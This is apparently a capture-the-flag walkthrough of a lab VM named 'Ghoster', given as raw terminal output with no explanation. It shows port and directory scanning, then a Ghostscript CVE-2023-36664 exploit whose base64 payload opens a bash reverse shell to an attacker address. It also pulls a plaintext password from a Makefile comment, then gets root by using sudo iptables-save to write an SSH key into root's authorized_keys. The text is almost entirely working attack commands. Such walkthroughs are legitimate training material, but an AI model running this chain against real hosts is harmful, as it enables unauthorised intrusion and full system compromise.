VulnVM-Ghoster

[root@kali] /home/kali/ghoster  
❯ nmap 192.168.55.65 -sV -A -p-                                                                                                              
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 c5:5f:01:14:c9:d4:fe:8e:9c:01:5f:3a:2c:dd:38:64 (ECDSA)
|_  256 63:25:3e:2b:61:4f:21:86:fa:d9:e5:d5:b6:bd:e8:29 (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
8081/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.11.2)
|_http-title: Document Submission Portal
|_http-server-header: Werkzeug/3.1.3 Python/3.11.2

[root@kali] /home/kali/ghoster  
❯ gobuster dir -u 'http://192.168.55.65/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   -x php                            ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.55.65/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/uploads              (Status: 301) [Size: 316] [--> http://192.168.55.65/uploads/]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

[root@kali] /home/kali/ghoster/CVE-2023-36664-Ghostscript-command-injection (main) 
❯ python3 CVE_2023_36664_exploit.py --inject --payload "printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41NS40LzQ0NDQgMD4mMSkgJg==|base64 -d|bash" --filename file.eps
[+] Payload successfully injected into file.eps.

www-data@debian:/opt$ grep -r 'john' .


./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History8.htm:john_clippedimage.pdf
./ghostscript-9.22/devices/gdevifno.c: * dithering tables courtesy of john hobby
./ghostscript-9.22/Makefile.in:# john:4Vn3r@bl3DevAcc3ss

john@debian:~$ sudo -l
Matching Defaults entries for john on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User john may run the following commands on debian:
    (ALL) NOPASSWD: /usr/sbin/iptables
    (ALL) NOPASSWD: /usr/sbin/iptables-save

john@debian:~$ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/john/.ssh/id_ed25519): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/john/.ssh/id_ed25519
Your public key has been saved in /home/john/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:WK4qgaoyeVRH8+YB0MyuSRZcW9xxa9Tk8wNKrqHcScs john@debian
The key's randomart image is:
+--[ED25519 256]--+
|   ..*......oo.  |
|    o Bo. .o o.  |
|     +.+.  .o.o  |
|    + o++ o.. .o |
| . + +.oS+ o   ..|
|. o o ..* =     .|
|.o .  .o E       |
|= o  .           |
|+o ..            |
+----[SHA256]-----+
john@debian:~$ 
john@debian:~$ cat ~/.ssh/id_ed25519.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAV3inh8dQh4PqqZ3uW8vWiB9aJQNxCPZE9S/DhrXdR john@debian
john@debian:~$ 

john@debian:~$ sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAV3inh8dQh4PqqZ3uW8vWiB9aJQNxCPZE9S/DhrXdR john@debian\n'
john@debian:~$ sudo /usr/sbin/iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -i lo -m comment --comment "
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAV3inh8dQh4PqqZ3uW8vWiB9aJQNxCPZE9S/DhrXdR john@debian
" -j ACCEPT
john@debian:~$ sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
john@debian:~$ ssh root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ED25519 key fingerprint is SHA256:g/sXDPjqMQ6xziAXUh9wGDT+oCQ5e85asA9DjLDDWbY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.
Linux debian 6.1.0-31-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.128-1 (2025-02-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 16 04:45:34 2025 from 10.0.0.175
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~#